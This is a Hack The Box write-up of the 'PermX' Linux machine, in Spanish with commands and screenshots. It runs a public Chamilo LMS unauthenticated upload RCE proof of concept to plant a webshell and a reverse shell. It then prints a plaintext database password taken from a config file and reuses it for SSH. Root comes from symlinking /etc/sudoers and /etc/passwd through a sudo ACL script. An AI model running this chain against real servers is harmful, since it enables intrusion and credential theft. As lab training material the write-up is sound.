PermX

PermX


HTB Linux

nmap -A -p- -oA permx 10.10.11.23 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA permx 10.10.11.23

nmap -sU -O -p- -oA permx-udp 10.10.11.23

ping -c 1 10.10.11.23

![ssh_command.](/20240715090020.png)

nmap -p- --open -T5 -v -n 10.10.11.145

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.145 -oG allPorts

![ssh_command.](/20240715085924.png)

extractPorts allPorts

nmap -sCV -p443 10.10.11.145 -oN targeted

![ssh_command.](/20240715090148.png)

bc targeted -l rb

![ssh_command.](/20240715090210.png)

echo "10.10.11.23 permx.htb lms.permx.htb" | sudo tee -a /etc/hosts

whatweb http://10.10.11.23

![ssh_command.](/20240715090423.png)

wfuzz -c --hc=302,404,403,400 -t 200 -w /usr/share/Seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.11.23/ -H "Host: FUZZ.permx.htb"

![ssh_command.](/20240715104158.png)

git clone https://github.com/m3m0o/chamilo-lms-unathenticated-big-upload-rce-poc.git

![ssh_command.](/20240715125742.png)

python3 main.py -u http://lms.permx.htb -a scan

![ssh_command.](/20240715125832.png)

python3 main.py -u http://lms.permx.htb -a webshell

![ssh_command.](/20240715125951.png)

python3 main.py -u http://lms.permx.htb -a revshell

![ssh_command.](/20240715134207.png)

nc -lvnp 9001

![ssh_command.](/20240715130901.png)

whoami

ls -ahl

![ssh_command.](/20240715135037.png)

cat /var/www/chamilo/app/config/configuration.php | grep -i password -C 3

![ssh_command.](/20240715134633.png)

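Credenciales encontradas en texto plano en configuration.php -> chamilo:03F6lY3uXAP2bkW8 (la misma contraseña se reutiliza en el siguiente paso para el acceso SSH como mtz)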

ssh mtz@permx.htb

![ssh_command.](/20240715135251.png)

cat user.txt

![ssh_command.](/20240715135453.png)

cat /opt/acl.sh

![ssh_command.](/20240715135714.png)

ln -s /etc/sudoers /home/mtz/sudoers

sudo /opt/acl.sh mtz rw /home/mtz/sudoers

sudo -l

![ssh_command.](/20240715140239.png)

openssl passwd -1 'password'

![ssh_command.](/20240715183424.png)

ln -s /etc/passwd /home/mtz/file

sudo /opt/acl.sh mtz rw /home/mtz/file

Copiamos el resultado del comando de openssl y con él reemplazamos el valor correspondiente en la primera fila del archivo

vim /home/mtz/file

su

cat root/root.txt

![ssh_command.](/20240715183409.png)

© 2024 Cu3rv0x